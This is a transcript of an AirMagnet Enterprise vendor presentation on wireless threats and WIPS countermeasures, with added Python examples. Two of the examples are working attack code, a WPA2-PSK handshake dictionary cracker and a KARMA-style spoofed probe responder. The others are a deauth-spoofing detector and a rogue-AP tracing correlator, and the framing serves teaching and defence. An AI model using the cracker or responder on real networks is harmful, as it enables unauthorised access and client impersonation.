ARE YOU READY FOR WIFI EXPLOSION?
Reiner Hofmann, EMEA Director Carrier Wireless Business
TRANSCRIPT
Fluke Networks is the world-leading provider of network test and monitoring solutions to speed the deployment and improve the performance of networks and applications. Leading enterprises and service providers trust Fluke Networks’ products and expertise to help solve today’s toughest issues and emerging challenges in data centers, mobility, unified communications and WLAN security.
Company Profile:
• $350+ million company; distributes products in more than 50 countries
• Over 800 employees worldwide with major facilities in: Everett, WA; Colorado Springs, CO; Santa Clara, CA; Duluth, GA; Rockville, MD; Beijing, China; Eindhoven, Netherlands
AirMagnet Enterprise provides:
• Additional layer of defense with focus on OSI layers 1 & 2
• Dynamic threat update
• Active blocking
• Forensic capture
• Threat correlation
• Smart device detection & classification
• 3rd party integration (SIM/NMS)
• Real-time proactive root cause analysis & troubleshooting
• Active testing (automatic health check)
• Purpose-built true spectrum analysis and classification of 2G/3G/4G (GSM/UMTS/LTE/PCS/AWS/SMR900/CDMA, Tetra (800 MHz), 900 MHz ISM), covering 698 MHz to 2690 MHz
EXECUTIVE SUMMARY
Fluke Networks AirMagnet Enterprise (AME) is NOT competing against AP infrastructure vendors. It is complementary to, and independent of, any particular WLAN system.
SOLUTIONS FOR THE ENTIRE WIRELESS LIFECYCLE
Lifecycle phases: Planning; Deployment & Verification; Troubleshooting & Interference; 24x7 Performance & Security
Product categories on the slide: Wired/WLAN Analysis; WLAN Test & Analysis; Spectrum Analysis
Products shown: OneTouch™ AT Network Assistant; OptiView® XG Network Analysis Tablet; AirMagnet Spectrum XT; AirCheck™ Wi-Fi Tester; AirMagnet VoFi Analyzer; AirMagnet WiFi Analyzer; AirMagnet Enterprise; AirMagnet Planner; AirMagnet Survey; AirMapper™; AirMagnet Spectrum ES
MOBILE DEVICES ARE EXPLODING
• 96% of mobile employees carry more than 2 devices; almost 50% carry more than 3
• iPads and eReaders entering the enterprise
• Most smart phones now mixed-use
From: Lisa Phifer / Core Competence, Interop/Sep-2010
THE WIRELESS JUNGLE GETS WILDER…
THE WIRELESS LANDSCAPE IS EVOLVING!!!
• Traffic & revenue is shifting indoors
• Huge mobile data explosion
• The race to LTE
• Increase in spectrum deficits
THE SECURITY WORLD IS GETTING MORE CHALLENGING
• Threats are increasing
• The number of assets that need protection is growing
• Sources of threats are evolving
• Security solutions need to be more discreet
WIRELESS SECURITY TRENDS FOR 2013
• Protecting and securing the air will become more important: protecting the device and the AP is not sufficient
• Mobile devices as the new target: with the explosion of BYOD in the marketplace, employees are bringing their mobile devices into work. With company data on these mobile devices, hackers have a much larger target.
• Cellular impersonation and jamming/DoS attacks: small cells are gaining traction and can offer a way into the corporate network
• Mobile devices as the attackers: lately there has been a proliferation of wireless hacking tools for the Android platform. Gone are the days when you needed a laptop to perform the attacks. Hackers can now do this from their pockets.
IT WILL BE MORE AND MORE CHALLENGING
WIRELESS SECURITY TRENDS FOR 2013
• Impersonation attacks are always on the rise: whether it's impersonating a valid client or impersonating a corporate access point, the threat is always loss of sensitive company data
• WPA-PSK brute force attacks will increase: just because you are using WPA-PSK doesn't mean you are safe. You need to have a policy for using complex pre-shared keys. There are plenty of online services that, for a small fee, will crack a captured handshake from your network in minutes if the passphrase is in a wordlist.
• Malware will increase: with the increasing proliferation of mobile devices, mobile adware will increase.
IT WILL BE MORE AND MORE CHALLENGING
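What those cracking services actually do with a captured handshake, as an added example written for this transcript (it is not code from the presentation or from Fluke Networks): derive the PMK from each candidate passphrase with PBKDF2, expand it to the PTK with the 802.11i PRF, and check whether the resulting KCK reproduces the MIC on EAPOL message 2. The SSID, MAC addresses, nonces and the weak passphrase are assumptions, and the "captured" handshake is constructed by simulating the client side of the exchange.

```python
# Added example (not Fluke/AirMagnet code): an offline dictionary attack on a captured
# WPA2-PSK 4-way handshake, which is what the online cracking services sell.
# The handshake here is CONSTRUCTED by simulating the client side; nothing is captured.
import hashlib
import hmac
import struct

SSID = "CorpGuest"                                # assumed SSID
AP_MAC = bytes.fromhex("00022d1b3e58")            # assumed AP (authenticator) address
STA_MAC = bytes.fromhex("00022d406486")           # assumed client (supplicant) address
ANONCE = hashlib.sha256(b"demo-anonce").digest()  # fixed 32-byte nonces so the run is reproducible
SNONCE = hashlib.sha256(b"demo-snonce").digest()
MIC_OFF = 81   # offset of the 16-byte MIC inside an EAPOL-Key frame (4-byte EAPOL header + 77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the only expensive step of the attack; a wordlist passphrase does not survive it."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 'Pairwise key expansion'; the first 16 bytes are the KCK used for the MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2/4 (RSN descriptor, key descriptor version 2 = HMAC-SHA1-128 MIC)."""
    key_info = 0x010A  # version 2 | pairwise | MIC present
    body = struct.pack(">BHH8s32s16s8s8s16sH",
                       2, key_info, 16, (1).to_bytes(8, "big"),        # descriptor, info, key len, replay ctr
                       snonce, b"\x00" * 16, b"\x00" * 8, b"\x00" * 8,  # SNonce, IV, RSC, ID
                       mic, 0)                                          # MIC, key data length
    return struct.pack(">BBH", 1, 3, len(body)) + body                 # EAPOL v1, type 3 = EAPOL-Key


def compute_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL frame with the MIC field zeroed, exactly as the supplicant computes it."""
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase: str) -> dict:
    """Simulate the supplicant producing message 2 with a valid MIC under `passphrase`.
    A real attacker reads these same fields off the air (messages 1 and 2 are enough)."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = build_eapol_msg2(SNONCE)
    frame = frame[:MIC_OFF] + compute_mic(kck, frame) + frame[MIC_OFF + 16:]
    return {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": frame}


def crack_handshake(hs: dict, wordlist):
    """Try each candidate; the one whose KCK reproduces the captured MIC is the PSK, else None."""
    observed = hs["eapol"][MIC_OFF:MIC_OFF + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(compute_mic(kck, hs["eapol"]), observed):
            return candidate
    return None


CAPTURE = make_handshake("Summer2013")            # constructed "capture" with a weak PSK
WORDLIST = ["password", "12345678", "Summer2013", "letmein1"]

if __name__ == "__main__":
    print("recovered PSK:", crack_handshake(CAPTURE, WORDLIST))
```

Nothing in the check depends on the AP; once the two nonces, both MACs and one MIC'd EAPOL frame are recorded, every candidate can be tested offline, so the only defense a PSK network has is a passphrase that is not in anyone's wordlist (or a move to 802.1X).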
WHAT ARE THE CHALLENGES?
Top needs:
• Need to detect unauthorized RF jammers
• Need to detect unauthorized cell phones and traffic
• Need to ensure "no-wireless zones"
• Need for affordable tools
• Need for an easy-to-use solution
• Need for a discreet security solution
• Capture & retain forensic evidence
• Mobile client is the weak point
• Need to secure layers 1 & 2: authentication & encryption are not sufficient
Some security basics
OSI MODEL
OSI layers (top to bottom): Application, Presentation, Session, Transport, Network, Data Link, Physical
IEEE 802 mapping: Data Link = Logical Link Control (LLC) + Media Access Control (MAC); Physical = Physical
Wireless LAN lives in the Physical and Data Link layers; perimeter/application security (firewall, IPS) works at the layers above.
Traditional IPS / FW does NOT cover layers 1/2.
Encryption covers only the data frame; the whole connection MUST be transparent to the security layer. Management and control frames travel unencrypted.
WIRELESS IS JUST LAYER 1 & 2
THE ROGUE ACCESS POINT
• Malicious or accidental
• Opens paths around wired security measures
• Allows external access to the wired network
• Rogues are the most well-known vulnerability
• Symptomatic of the greater security challenge of wireless
[Diagram: firewall / NAT / IDS at the perimeter; rogue AP plugged in inside the network]
PHYSICAL DEPLOYMENT OF AN UNAUTHORIZED AP INSIDE THE NETWORK
INTERNAL TRAFFIC
• Outsiders can see anything in the clear (email, web, etc.)
• Users and devices can be seen and targeted directly (circumvents NAT)
• Clients can connect directly via ad-hoc
• Every device and all traffic must be secured
• Creates massive new management challenges to ensure encryption and configuration for all devices
[Diagram: firewall / NAT / IDS; approved AP; ad-hoc clients; hacker listening to the airwaves, capturing traffic in the clear and capturing and breaking weak keys]
ALL INTERNAL CLIENT TRAFFIC CAN BE DIRECTLY MONITORED FROM THE OUTSIDE
OUTBOUND CONNECTIONS
• Clients can make connections without ever touching the corporate infrastructure
• Accidental associations are very common
• Many wireless hacks target clients in order to retrieve login information
[Diagram: firewall / NAT / IDS; neighbor hotspot; hacker listening to the airwaves captures traffic in the clear]
LOSS OF VISIBILITY INTO OUTBOUND CONNECTIONS
KARMA
• Listens for probe requests and learns all networks that all clients in the area are probing for
• Responds to, and beacons as, all those networks as well as common default networks (FreeWiFi, vendor defaults, etc.)
• Clients will respond to beacons they recognize, even if the client did not probe for that network
Client: "Network A, are you there?" "Network B, are you there?"
Attacker: "I am Network A" "I am Network B" "I am FreeWiFi"
LEARNS ALL NETWORKS THAT ALL CLIENTS ARE PROBING FOR IN THE AREA
KARMETASPLOIT
Main differences:
• Karmetasploit does not have the limitation of only working on hardware configured with the patched MadWifi drivers
• Includes a DNS daemon that responds to all requests, a POP3 service, an IMAP4 service, an SMTP service, an FTP service, a couple of different SMB services and, most importantly, a web service
• Comes with the powerful exploit framework that is Metasploit
EVEN MORE SOPHISTICATED
TELLS YOU EVERYTHING
BEACON AND PROBE FRAME
IEEE 802.11
  Type/Subtype: Data (32)
  Frame Control: 0x4108 (Normal)
    Version: 0
    Type: Data frame (2)
    Subtype: 0
    Flags: 0x41
      DS status: Frame is entering DS (To DS: 1 From DS: 0) (0x01)
      .... .0.. = More Fragments: This is the last fragment
      .... 0... = Retry: Frame is not being retransmitted
      ...0 .... = PWR MGT: STA will stay up
      ..0. .... = More Data: No data buffered
      .1.. .... = WEP flag: WEP is enabled
      0... .... = Order flag: Not strictly ordered
  Duration: 25818
  BSS Id: 00:02:2d:1b:3e:58 (Agere_1b:3e:58)
  Source address: 00:02:2d:40:64:86 (Agere_40:64:86)
  Destination address: 00:06:25:ff:95:8e (LinksysG_ff:95:8e)
  Fragment number: 0
  Sequence number: 67
  WEP parameters
    Initialization Vector: 0x0b0931
    Key: 0
    WEP ICV: 0x975415b1 (not verified)
Data (72 bytes)

0000  08 41 02 01 00 02 2d 1b 3e 58 00 02 2d 40 64 86
0010  00 06 25 ff 95 8e 30 04 0b 09 31 00 a3 a4 fd 36
0020  67 fb bd aa 88 cf bf de 92 ec d7 3a 3f 74 26 83
0030  bc cf 65 40 2d e7 41 f1 77 b6 7d a7 0f 7e 01 1e
0040  d9 ef f6 92 11 28 f4 57 d6 ee 8f 99 5e bf a2 ab
0050  e4 e1 86 84 41 5f 69 0b 0f 9f 4e e4 81 b4 2a 3e
0060  26 36 ac 02 97 54 15 b1

Which OS? Is there a threat available for it? Can I use a default key, even with strong encryption …
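The two previous slides make the same point from opposite sides: a passive listener learns who talks to whom (and, for WEP, the IV and key index) from every data frame, and learns each client's preferred network list from its probe requests, which is what KARMA replays back. The following added example, written for this transcript and not code from the presentation or from Fluke Networks, decodes the hex dump shown above and then runs a minimal KARMA-style listener over constructed probe requests. The client and attacker MAC addresses and the probed SSIDs are assumptions.

```python
# Added example (not Fluke/AirMagnet code): decode raw 802.11 frames. Two uses:
#  (a) the WEP data frame dissected above, fed in as the slide's own hex dump, and
#  (b) a KARMA-style listener that harvests SSIDs from clients' probe requests and answers
#      each one as that network. The probe requests below are CONSTRUCTED, not captured.
import struct
from collections import defaultdict

FT_MGMT, FT_DATA = 0, 2
ST_PROBE_REQ, ST_PROBE_RESP = 4, 5
BCAST = b"\xff" * 6
IE_SSID = 0

# Bytes from the hex dump above: 24-byte header, 4-byte WEP IV/key id, 72 bytes ciphertext, 4-byte ICV.
WEP_FRAME = bytes.fromhex(
    "08410201 00022d1b 3e580002 2d406486 000625ff 958e3004 0b093100 a3a4fd36"
    "67fbbdaa 88cfbfde 92ecd73a 3f742683 bccf6540 2de741f1 77b67da7 0f7e011e"
    "d9eff692 1128f457 d6ee8f99 5ebfa2ab e4e18684 415f690b 0f9f4ee4 81b42a3e"
    "2636ac02 975415b1"
)


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def parse_80211(frame: bytes) -> dict:
    """Decode the 24-byte MAC header common to management and (non-QoS, 3-address) data frames."""
    fc, duration, a1, a2, a3, seqctl = struct.unpack("<HH6s6s6sH", frame[:24])
    return {
        "type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
        "to_ds": bool(fc & 0x0100), "from_ds": bool(fc & 0x0200),
        "retry": bool(fc & 0x0800), "protected": bool(fc & 0x4000),  # the "WEP flag" of old dissectors
        "duration": duration,
        "addr1": mac_str(a1), "addr2": mac_str(a2), "addr3": mac_str(a3),
        "frag": seqctl & 0xF, "seq": seqctl >> 4,
        "body": frame[24:],
    }


def parse_ies(body: bytes) -> dict:
    """Information elements are a TLV list: 1-byte tag, 1-byte length, value."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        tag, ln = body[i], body[i + 1]
        ies[tag] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies


def parse_wep_data(frame: bytes) -> dict:
    """Everything a passive listener sees of a WEP frame: who talks to whom, the IV and the key id."""
    h = parse_80211(frame)
    if h["to_ds"] and not h["from_ds"]:           # STA -> AP: addr1=BSSID, addr2=SA, addr3=DA
        h.update(bssid=h["addr1"], sa=h["addr2"], da=h["addr3"])
    body = h["body"]
    h.update(wep_iv=body[:3].hex(), key_index=body[3] >> 6,
             ciphertext_len=len(body) - 8, icv=body[-4:].hex())
    return h


def build_probe_request(client: str, ssid: str, seq: int) -> bytes:
    fc = (FT_MGMT << 2) | (ST_PROBE_REQ << 4)
    hdr = struct.pack("<HH6s6s6sH", fc, 0, BCAST, mac_bytes(client), BCAST, seq << 4)
    return hdr + bytes([IE_SSID, len(ssid)]) + ssid.encode()


def build_probe_response(bssid: str, client: str, ssid: str, seq: int = 0) -> bytes:
    """What KARMA sends back: a probe response claiming to be `ssid`, as an open (no privacy) network."""
    fc = (FT_MGMT << 2) | (ST_PROBE_RESP << 4)
    hdr = struct.pack("<HH6s6s6sH", fc, 0, mac_bytes(client), mac_bytes(bssid), mac_bytes(bssid), seq << 4)
    fixed = struct.pack("<QHH", 0, 100, 0x0001)   # timestamp, beacon interval, capability: ESS only
    return hdr + fixed + bytes([IE_SSID, len(ssid)]) + ssid.encode()


class KarmaListener:
    """Learns each client's preferred network list from directed probes and answers as every one."""

    def __init__(self, bssid: str):
        self.bssid = bssid
        self.pnl = defaultdict(set)               # client MAC -> SSIDs it has asked for

    def observe(self, frame: bytes):
        h = parse_80211(frame)
        if h["type"] != FT_MGMT or h["subtype"] != ST_PROBE_REQ:
            return None
        ssid = parse_ies(h["body"]).get(IE_SSID, b"").decode(errors="replace")
        if not ssid:                               # wildcard probe: nothing to impersonate
            return None
        self.pnl[h["addr2"]].add(ssid)
        return build_probe_response(self.bssid, h["addr2"], ssid)


if __name__ == "__main__":
    print(parse_wep_data(WEP_FRAME))
    karma = KarmaListener("02:00:00:ba:d0:01")     # assumed attacker BSSID
    for f in (build_probe_request("02:00:00:aa:bb:01", "CorpWiFi", 1),
              build_probe_request("02:00:00:aa:bb:01", "HomeNet", 2),
              build_probe_request("02:00:00:aa:bb:02", "", 7)):
        karma.observe(f)
    print(dict(karma.pnl))
```

Two details worth noting: a wildcard probe (empty SSID) gives the listener nothing to impersonate, which is why modern clients prefer it for hidden-network discovery, and none of the fields decoded here are protected by WEP or WPA, which is the gap the later slide on unauthenticated management frames describes.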
WIRELESS CLIENT ATTACKS
Denial of Service – RF or MAC based
• Easy to spoof disassociation and deauthentication frames
• Easy to inject broadcast and multicast traffic
DoS a station with WLAN-Jack (target user, AP, attacker):
1. User enjoying a good connection (AP MAC: 00 02 2D 50 D1 4E)
2. Attacker impersonates the AP (original MAC: 00 12 2D 50 43 1E; new MAC: 00 02 2D 50 D1 4E)
3. Attacker sends disassoc & deauth frames to the user
Exploiting driver vulnerabilities to run remote code, inject malware, etc.
IEEE 802.11 MANAGEMENT FRAMES ARE NOT AUTHENTICATED
(802.11w Protected Management Frames, where both AP and client support it, adds integrity protection to deauth and disassoc frames; without it, anyone who knows the two MAC addresses can forge them.)
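Because the forged frames are indistinguishable by content, a monitoring sensor detects them by behaviour. The following added example, written for this transcript and not code from the presentation or from Fluke Networks, applies two checks a layer 2 WIPS can make without 802.11w: a deauth claiming to come from the AP whose sequence number is far from the AP's own running counter (the attacker's radio has its own counter), and a burst of deauth/disassoc frames per claimed transmitter. The event stream is constructed to replay the three steps above; the AP MAC is the one on the slide, the client MAC is an assumption.

```python
# Added example (not Fluke/AirMagnet code): how a monitoring sensor can tell forged deauth /
# disassoc frames from genuine ones without 802.11w. Input is a stream of already-decoded
# management-frame events (time, subtype, transmitter, receiver, sequence number); the events
# below are CONSTRUCTED to replay the three-step attack on this slide.
from collections import defaultdict, deque

BEACON, DISASSOC, DEAUTH = 0x08, 0x0A, 0x0C
SEQ_MODULUS = 4096            # the 802.11 sequence counter is 12 bits


class DeauthDetector:
    def __init__(self, window_s: float = 1.0, flood_threshold: int = 5, seq_tolerance: int = 16):
        self.window_s = window_s
        self.flood_threshold = flood_threshold
        self.seq_tolerance = seq_tolerance
        self.last_seq = {}                     # transmitter -> last plausible sequence number
        self.recent = defaultdict(deque)       # transmitter -> timestamps of recent deauth/disassoc
        self.flooding = set()
        self.alarms = []

    def observe(self, t: float, subtype: int, ta: str, ra: str, seq: int) -> None:
        if subtype not in (DEAUTH, DISASSOC):
            self.last_seq[ta] = seq            # beacons/data from the real radio keep its counter current
            return
        # Check 1: a forged frame carries the attacker's sequence counter, not the AP's, so it lands
        # far from the AP's last genuine frame (a retransmission reuses the same seq, delta 0, and passes).
        last = self.last_seq.get(ta)
        if last is not None and (seq - last) % SEQ_MODULUS > self.seq_tolerance:
            self.alarms.append((t, "SPOOFED_SOURCE", ta, ra, f"seq {seq} vs last genuine {last}"))
        else:
            self.last_seq[ta] = seq            # plausible: a real deauth also advances the counter
        # Check 2: rate of disruptive frames per claimed transmitter inside a sliding window.
        q = self.recent[ta]
        q.append(t)
        while q and t - q[0] > self.window_s:
            q.popleft()
        if len(q) >= self.flood_threshold:
            if ta not in self.flooding:        # alarm once per burst, not once per frame
                self.flooding.add(ta)
                self.alarms.append((t, "DEAUTH_FLOOD", ta, ra, f"{len(q)} frames in {self.window_s}s"))
        else:
            self.flooding.discard(ta)


def run(events) -> list:
    det = DeauthDetector()
    for ev in events:
        det.observe(*ev)
    return det.alarms


AP = "00:02:2d:50:d1:4e"          # the AP MAC from the slide's diagram
STA = "02:00:00:aa:bb:01"         # assumed client MAC
EVENTS = (
    # 1. user enjoying a good connection: the AP beacons with its own counter
    [(0.1 * i, BEACON, AP, "ff:ff:ff:ff:ff:ff", 100 + i) for i in range(5)]
    # a single genuine deauth from the AP continues that counter: no alarm
    + [(0.5, DEAUTH, AP, STA, 105)]
    # 2./3. attacker impersonates the AP's MAC and floods deauths using its own counter
    + [(0.6 + 0.05 * i, DEAUTH, AP, STA, 2000 + i) for i in range(10)]
)

if __name__ == "__main__":
    for alarm in run(EVENTS):
        print(alarm)
```

The sequence-number check is the one that separates "the AP really did kick this client" from "someone is pretending to be the AP"; the rate check alone would also fire on a misbehaving but genuine AP, which is a different ticket.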
WiFi Pineapple
WPA CRACKING
ENTERPRISE WLAN SECURITY THREAT TRENDS
• Easier to use
• Easier to get
ATTACKS ARE MORE SOPHISTICATED
Security values
WIRED NETWORKS ARE DESIGNED FOR A LINEAR ASSAULT
FOCUS OF THE NETWORK IS SHIFTING TO THE EDGE
• Traditional networks delivered security and control through centralization
• Heavily secured entry and exit points
• Multiple layers of security
• Frequent zero-day threat updates are routine
• Security policy enforcement with active blocking
• Threat correlation and mitigation
• Internal devices benefit from umbrella coverage
THE NEED FOR NEW TYPES OF OVERSIGHT
• Mobility breaks the centralized model by opening the door to outbound connections
• Now internal-only traffic is also exposed
• "Network traffic has moved to the suburbs"
• All traffic in a shared medium
• Direct access to the outside world
• Internal traffic exposed
LOSS OF SECURITY
[Diagram: intranet behind Layer 4-7 firewalls; WLC; AP with built-in security as a rudimentary line of defense; Layer 2 traffic on the wireless side]
WIRELESS AP WITH RUDIMENTARY BUILT-IN SECURITY FEATURES
• Just one layer of security on the wireless side (layer 2)
• No threat/signature update
• No security policy enforcement with active blocking
• No threat correlation and mitigation
• Under a DoS or layer 1 jamming attack, the AP-based solution will immediately fail
Static security cannot keep pace with new devices, new technologies, new protocols, new threats...
If not in full monitor mode, APs:
• are busy with other services
• can only do part-time scanning
• need to decide between scanning and signal provisioning
AME ADDS ANOTHER LINE OF DEFENSE
[Diagram: intranet behind Layer 4-7 firewalls; AP with built-in security as a rudimentary line of defense; AME sensor as the 1st line of defense (layer 2 WIPS) on the Layer 2 traffic; DTU: the server downloads the new signature module from Flukenetworks.com]
AME Sensor:
• Real-time monitoring
• Zero-day threat protection
• Blocking
• Policy enforcement
• Attack IDS
• Forensics
WIRELESS AP WITH RUDIMENTARY BUILT-IN SECURITY FEATURES + AME
+ Heavily secured entry and exit points
+ Multiple layers of security
+ Frequent zero-day threat update
+ Security policy enforcement with active blocking
+ Threat correlation and mitigation
+ Real-time monitoring
+ NMS, SIEM integration
+ Forensic analysis (file capturing)
+ Full rogue RF + wire trace and blocking
+ Security system resilience
+ …
+ Internal devices benefit from umbrella coverage
AirMagnet Enterprise is closing the major gaps:
- 1st line of defense
- Frequent threat update
- Active blocking
Principle Architecture
AIRMAGNET ENTERPRISE SYSTEM ARCHITECTURE
FLEXIBLE AND SCALABLE
Servers:
• Runs on virtual or dedicated Windows Server environments
• Hot standby server can be in a separate datacenter
• Supports up to 1000 sensors per server
Sensors:
• Sensors can be located anywhere in the global network; they use a secure SSL-based link to the server
• Hardware and software sensor agents can be combined for optimal monitoring
WHAT IS THE SENSOR'S MECHANICAL DESIGN?
• Distinctive look
• Blends visually into a ceiling mount; unobtrusive in sensitive aesthetic environments like VIP areas or hospitals
• Internal and external antenna options
"AIRWISE" IS THE HEART OF AME
PROVIDES PROACTIVE ALERTING
The most comprehensive list of WIPS signatures in the industry: the AirWISE Encyclopedia. Every signature contains a detailed description of the attack and how to remediate the threat. Set threshold levels to trigger different notifications. AirWISE automatically checks for hundreds of potential problems around the clock.
Get notified: trigger alerts via email, SNMP, instant message, page to specific targets
Escalate: set multiple thresholds and responses for each policy
"…Just send a note when channel utilization hits 30%, but start paging staff when it hits 40%"
QUICKLY UPDATE TO PROTECT AGAINST A NEW THREAT
DYNAMIC THREAT UPDATE - DTU
Timeline: vulnerability published → analyze & assess severity, post response (1 day – 2 weeks) → create and release new alarm, publish DTU file (1 day – 2 weeks) → automated DTU download (sensors check every hour) & alarm is active (instant)
End-user timeline: 0 days / 1 day to 2 weeks
• The AirMagnet Wireless Intrusion Research team can rapidly customize or create new signatures/rules for newly discovered vulnerabilities
• Users have immediate protection from new threats
• No disruption of WIPS protection or wireless service to update the signature module
• Automated updates require no IT staff cycles
• Users and the AirWISE community contribute to the creation of new signatures
New threat signatures are automatically delivered to sensors across the organization for instant protection with no down time and no IT staff
DTU – JUST ONE EXAMPLE
AUTOMATED PROTECTION
EXAMPLE – HOW DOES AME WORK?
COUNTERMEASURES
Wireless termination:
• Terminates the target device only – minimal disruption to the rest of the network
• Automated or on-command disconnect
• Authorization required, audit trail maintained
• Compliant with applicable laws & FCC regulations
Wired-side port shutdown:
• Port look-up and suppression
• On-command shutdown
[Diagram: AirMagnet server and sensor, switch, laptop, neighboring AP. "ALERT! Accidental association" → "TERMINATED! Accidental association"; "ALERT! Rogue AP on network" → "PORT SUPPRESSED! Rogue AP on network"]
AUTOMATED PERIMETER DETECTION
A specific event alarm triggers when a rogue AP is found INSIDE the premise boundary
COUNTERMEASURES
5 DIFFERENT METHODS FOR TRACING ROGUE ACCESS POINTS
Wireless tracing: when the sensor detects an open rogue or unknown AP, it will attempt to connect to it. Once connected, it forwards a frame to itself to determine whether the AP is on the wire.
Wired listener: the sensor puts its wired interface into promiscuous mode and listens for broadcast frames, trying to match them against the rogue and unknown APs that are seen (wired MAC within +2/-2 of the wireless MAC address).
DHCP fingerprinting: the sensor's wired interface listens for DHCP request packets to determine whether the unknown or rogue device is on the wire.
eROW: ARP sweep the subnet and compare the list of MAC addresses with the unknown or rogue list (+2/-2 of the wireless MAC address).
Switch tracing: using SNMP, crawl the switches looking for the wireless MAC address of rogue and unknown APs (+2/-2 of the wireless MAC address); if it can't be found via this method, tracing can also be done based on the connected stations' MAC addresses.
(The +2/-2 window exists because consumer APs typically assign consecutive MAC addresses to their radio and Ethernet interfaces; it is a heuristic, and the wireless trace that forwards a frame to the sensor itself is the conclusive test.)
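The wired-side half of the five methods above is a correlation problem: BSSIDs seen in the air against MACs seen by the sensor's wired interface (ARP sweep), by the switches (CAM tables read over SNMP) and in DHCP requests. The following added example, written for this transcript and not code from the presentation or from Fluke Networks, implements that correlation with the +2/-2 window and the fallback to associated stations' MACs. All tables are constructed; the BSSIDs, switch names, ports and hostname are assumptions.

```python
# Added example (not Fluke/AirMagnet code): the wired-side part of rogue tracing, i.e. matching
# BSSIDs seen in the air against what the wired interface sees (ARP sweep, switch CAM tables via
# SNMP, DHCP requests) using the +2/-2 MAC window. All tables below are CONSTRUCTED.

MAC_MASK = (1 << 48) - 1


def mac_int(m: str) -> int:
    return int(m.replace(":", ""), 16)


def mac_fmt(i: int) -> str:
    return ":".join(f"{(i >> s) & 0xFF:02x}" for s in range(40, -1, -8))


def neighbor_macs(bssid: str, spread: int = 2) -> set:
    """Wired MACs a device with this radio BSSID is likely to use: BSSID +/- spread."""
    base = mac_int(bssid)
    return {mac_fmt((base + d) & MAC_MASK) for d in range(-spread, spread + 1)}


def correlate(rogues: dict, arp_table: dict, cam_table: dict, dhcp_requests: list) -> list:
    """rogues: BSSID -> {"clients": [station MACs]}; arp_table: MAC -> IP;
    cam_table: MAC -> (switch, port); dhcp_requests: [(chaddr, hostname)].
    Returns (bssid, method, wired_mac, evidence) tuples."""
    findings = []
    for bssid, info in rogues.items():
        cands = neighbor_macs(bssid)
        for mac in sorted(cands & arp_table.keys()):
            findings.append((bssid, "arp_sweep", mac, arp_table[mac]))
        for chaddr, host in dhcp_requests:
            if chaddr in cands:
                findings.append((bssid, "dhcp_fingerprint", chaddr, host))
        traced = False
        for mac in sorted(cands & cam_table.keys()):
            findings.append((bssid, "switch_trace", mac, cam_table[mac]))
            traced = True
        if not traced:
            # A rogue that bridges at layer 2 shows its clients' MACs on its own switch port.
            for client in info.get("clients", []):
                if client in cam_table:
                    findings.append((bssid, "switch_trace_via_client", client, cam_table[client]))
    return findings


def ports_to_suppress(findings: list) -> set:
    """Switch ports the server would shut down, once an operator authorises it."""
    return {ev for _, method, _, ev in findings if method.startswith("switch_trace")}


# --- constructed data ---
ROGUES = {
    "00:1a:2b:3c:4d:51": {"clients": []},                     # radio MAC; its wired port is one below
    "c4:e9:84:aa:bb:10": {"clients": ["02:00:00:aa:bb:01"]},  # bridging rogue: only its clients leak through
    "00:11:22:33:44:55": {"clients": []},                     # neighbour's AP, not on our wire
}
ARP_TABLE = {"00:1a:2b:3c:4d:50": "10.1.3.77", "00:50:56:01:02:03": "10.1.3.10"}
CAM_TABLE = {"00:1a:2b:3c:4d:50": ("sw-floor3", "Gi1/0/17"),
             "02:00:00:aa:bb:01": ("sw-floor3", "Gi1/0/22"),
             "00:50:56:01:02:03": ("sw-floor3", "Gi1/0/1")}
DHCP_REQUESTS = [("00:1a:2b:3c:4d:50", "TL-WR841N")]

if __name__ == "__main__":
    found = correlate(ROGUES, ARP_TABLE, CAM_TABLE, DHCP_REQUESTS)
    for f in found:
        print(f)
    print(ports_to_suppress(found))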
DETECT ROGUES
COMPLETE SECURITY VISIBILITY
SCANNING ON ALL 200 EXTENDED CHANNELS FOR 5 GHZ
FORENSIC CAPTURE
BETTER THAN BEING THERE
• The challenge: security and performance event triggers often require post inspection to determine remediation
• Solution with forensics: automatically capture Wi-Fi and spectrum forensic data in the background; review the packet-level capture at the exact moment of the trigger for deep forensics of the threat source
3G/4G/LTE spectrum analysis
KEY FEATURES & BENEFITS
• Detect unauthorized cell phone traffic
• Ensure "no-wireless" zones
• Enables users with zero-day interference intelligence to detect/identify, classify & locate security threats due to RF interference sources
• Instant detection of cellular data/voice events
• Capture & save, maintain forensic evidence
• Monitor public safety DAS networks
ALL UNIQUE
INTERFERENCE INTELLIGENCE:
• Detect unauthorized interference sources that pose a high security risk for authorized defense/federal networks
  - 3-prong response: detect, classify & locate
  - Built-in classification of RF jammers and CW devices that could render networks unusable
  - Classify any interference source with custom signature capability
  - Built-in locator tool to pinpoint the location
• Detect unauthorized cell phones or cell phone data/voice traffic
• Ensure "no-wireless zones"
